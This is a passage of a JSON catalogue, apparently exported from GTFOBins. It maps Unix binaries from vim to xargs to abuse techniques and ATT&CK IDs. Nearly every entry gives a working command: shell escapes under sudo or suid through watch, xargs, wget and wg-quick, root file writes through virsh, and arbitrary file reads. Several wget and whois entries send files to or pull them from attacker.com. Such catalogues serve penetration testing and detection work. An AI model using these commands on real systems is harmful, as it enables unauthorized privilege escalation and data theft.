Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vim:inherit:2:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"]},{"id":"gtfo:vipw:inherit:0:sudo","toolId":"gtfo:vipw","toolName":"vipw","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vipw","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vipw/"]},{"id":"gtfo:vipw:inherit:0:suid","toolId":"gtfo:vipw","toolName":"vipw","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vipw","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vipw/"]},{"id":"gtfo:virsh:command:0:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-file.xml <<EOF\n<domain type='kvm'>\n <name>x</name>\n <os>\n <type arch='x86_64'>hvm</type>\n </os>\n <memory unit='KiB'>1</memory>\n <devices>\n <interface type='ethernet'>\n <script path='/path/to/command'/>\n </interface>\n </devices>\n</domain>\nEOF\nvirsh -c qemu:///system create /path/to/temp-file.xml\nvirsh -c qemu:///system destroy x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"]},{"id":"gtfo:virsh:file-write:0:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\n\ncat >/path/to/temp-file.xml <<EOF\n<volume type='file'>\n <name>y</name>\n <key>/path/to/output-dir/output-file</key>\n <source>\n </source>\n <capacity unit='bytes'>5</capacity>\n <allocation unit='bytes'>4096</allocation>\n <physical unit='bytes'>5</physical>\n <target>\n <path>/path/to/output-dir/output-file</path>\n <format type='raw'/>\n <permissions>\n <mode>0600</mode>\n <owner>0</owner>\n <group>0</group>\n </permissions>\n </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target /path/to/output-dir/\nvirsh -c qemu:///system vol-create --pool x --file /path/to/temp-file.xml\nvirsh -c qemu:///system vol-upload --pool x /path/to/output-dir/output-file /path/to/temp-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"]},{"id":"gtfo:virsh:file-write:0:unprivileged","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\n\ncat >/path/to/temp-file.xml <<EOF\n<volume type='file'>\n <name>y</name>\n <key>/path/to/output-dir/output-file</key>\n <source>\n </source>\n <capacity unit='bytes'>5</capacity>\n <allocation unit='bytes'>4096</allocation>\n <physical unit='bytes'>5</physical>\n <target>\n <path>/path/to/output-dir/output-file</path>\n <format type='raw'/>\n <permissions>\n <mode>0600</mode>\n <owner>0</owner>\n <group>0</group>\n </permissions>\n </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target /path/to/output-dir/\nvirsh -c qemu:///system vol-create --pool x --file /path/to/temp-file.xml\nvirsh -c qemu:///system vol-upload --pool x /path/to/output-dir/output-file /path/to/temp-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/virsh/"]},{"id":"gtfo:virsh:file-write:1:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"virsh -c qemu:///system pool-create-as x dir --target /path/to/dir/\nvirsh -c qemu:///system vol-download --pool x input-file output-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"]},{"id":"gtfo:virsh:file-write:1:unprivileged","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"virsh -c qemu:///system pool-create-as x dir --target /path/to/dir/\nvirsh -c qemu:///system vol-download --pool x input-file output-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/virsh/"]},{"id":"gtfo:volatility:inherit:0:sudo","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/volatility/"]},{"id":"gtfo:volatility:inherit:0:suid","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/volatility/"]},{"id":"gtfo:volatility:inherit:0:unprivileged","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/volatility/"]},{"id":"gtfo:w3m:file-read:0:sudo","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/w3m/"]},{"id":"gtfo:w3m:file-read:0:suid","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/w3m/"]},{"id":"gtfo:w3m:file-read:0:unprivileged","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/w3m/"]},{"id":"gtfo:wall:file-read:0:sudo","toolId":"gtfo:wall","toolName":"wall","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wall --nobanner /path/to/input-file","description":"The textual file is dumped on the current TTY (neither to `stdout` nor to `stderr`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wall/"]},{"id":"gtfo:watch:shell:0:sudo","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -c 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:watch:shell:0:suid","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -p -c 'reset; exec /bin/sh -p 1>&0 2>&0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:watch:shell:0:unprivileged","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -c 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:watch:shell:1:sudo","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:watch:shell:1:suid","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:watch:shell:1:unprivileged","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/watch/"]},{"id":"gtfo:wc:file-read:0:sudo","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wc/"]},{"id":"gtfo:wc:file-read:0:suid","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wc/"]},{"id":"gtfo:wc:file-read:0:unprivileged","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wc/"]},{"id":"gtfo:wg-quick:shell:0:sudo","toolId":"gtfo:wg-quick","toolName":"wg-quick","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file.conf <<EOF\n[Interface]\nPostUp = /bin/sh\nEOF\n\nwg-quick up /path/to/temp-file.conf","description":"Use `wg-quick down /path/to/temp-file.conf` in order to be able to run the shell again.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wg-quick/"]},{"id":"gtfo:wget:download:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:download:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:download:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-read:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-read:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-read:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-write:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-write:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:file-write:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:shell:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh\\n/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:shell:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh -p\\n/bin/sh -p 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:shell:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh\\n/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:1:sudo","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:1:suid","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:wget:upload:1:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"]},{"id":"gtfo:whiptail:file-read:0:sudo","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whiptail/"]},{"id":"gtfo:whiptail:file-read:0:suid","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whiptail/"]},{"id":"gtfo:whiptail:file-read:0:unprivileged","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whiptail/"]},{"id":"gtfo:whois:download:0:sudo","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:whois:download:0:suid","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:whois:download:0:unprivileged","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:whois:upload:0:sudo","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:whois:upload:0:suid","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:whois:upload:0:unprivileged","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whois/"]},{"id":"gtfo:wireshark:file-write:0:sudo","toolId":"gtfo:wireshark","toolName":"wireshark","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wireshark -c 1 -i lo -k -f 'udp port 12345' &\necho DATA | nc -u 127.127.127.127 12345","description":"This technique can be used to write arbitrary files, i.e., the dump of one UDP packet.\n\nAfter starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved:\n\n1. select the only received packet;\n\n2. right-click on \"Data\" from the \"Packet Details\" pane, and select \"Export Packet Bytes...\";\n\n3. choose where to save the packet dump.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wireshark/"]},{"id":"gtfo:wireshark:file-write:0:unprivileged","toolId":"gtfo:wireshark","toolName":"wireshark","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"wireshark -c 1 -i lo -k -f 'udp port 12345' &\necho DATA | nc -u 127.127.127.127 12345","description":"This technique can be used to write arbitrary files, i.e., the dump of one UDP packet.\n\nAfter starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved:\n\n1. select the only received packet;\n\n2. right-click on \"Data\" from the \"Packet Details\" pane, and select \"Export Packet Bytes...\";\n\n3. choose where to save the packet dump.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wireshark/"]},{"id":"gtfo:wireshark:inherit:0:sudo","toolId":"gtfo:wireshark","toolName":"wireshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"wireshark","description":"This requires GUI interaction. Start Wireshark, then from the main menu, select \"Tools\" -> \"Lua\" -> \"Evaluate\". A window opens that allows to execute Lua code.","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wireshark/"]},{"id":"gtfo:wireshark:inherit:0:unprivileged","toolId":"gtfo:wireshark","toolName":"wireshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"wireshark","description":"This requires GUI interaction. Start Wireshark, then from the main menu, select \"Tools\" -> \"Lua\" -> \"Evaluate\". A window opens that allows to execute Lua code.","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wireshark/"]},{"id":"gtfo:wish:inherit:0:sudo","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wish/"]},{"id":"gtfo:wish:inherit:0:suid","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wish/"]},{"id":"gtfo:wish:inherit:0:unprivileged","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wish/"]},{"id":"gtfo:xargs:file-read:0:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:file-read:0:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:file-read:0:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:0:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"]},{"id":"gtfo:xargs:shell:0:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh 